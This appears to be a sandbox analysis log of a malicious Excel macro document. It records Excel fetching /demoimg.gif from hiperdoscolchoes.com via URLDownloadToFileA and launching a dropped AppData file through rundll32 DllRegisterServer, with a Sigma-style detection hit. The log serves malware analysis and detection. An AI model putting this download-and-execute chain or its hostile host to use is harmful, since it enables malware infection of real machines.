Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: rundll32 ..\AppData\Roaming\JKER.UUIIKKAA,DllRegisterServer, CommandLine: rundll32 ..\AppData\Roaming\JKER.UUIIKKAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6524, ProcessCommandLine: rundll32 ..\AppData\Roaming\JKER.UUIIKKAA,DllRegisterServer, ProcessId: 6004 |
Source: Document_280325456.xlsm | Virustotal: Detection: 11% |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: z: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: x: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: v: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: t: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: r: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: p: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: n: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: l: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: j: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: h: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: f: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: b: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: y: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: w: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: u: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: s: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: q: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: o: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: m: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: k: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: i: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: g: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: e: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: c: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: a: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe |
Source: global traffic | DNS query: name: hiperdoscolchoes.com |
Source: global traffic | TCP traffic: 192.168.2.4:49732 -> 173.212.233.8:80 |
Source: global traffic | HTTP traffic detected: GET /demoimg.gif HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: hiperdoscolchoes.com Connection: Keep-Alive |
Source: unknown | DNS traffic detected: queries for: hiperdoscolchoes.com |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 05 Jan 2021 20:20:52 GMT Server: Apache Accept-Ranges: bytes Content-Length: 613 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Data Ascii: <script type="text/javascript"> var GOOG_FIXURL_LANG = 'pt-PT'; var GOOG_FIXURL_SITE = 'http://www.dreamstore.com.pt/';</script><script type="text/javascript" src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script><!-- |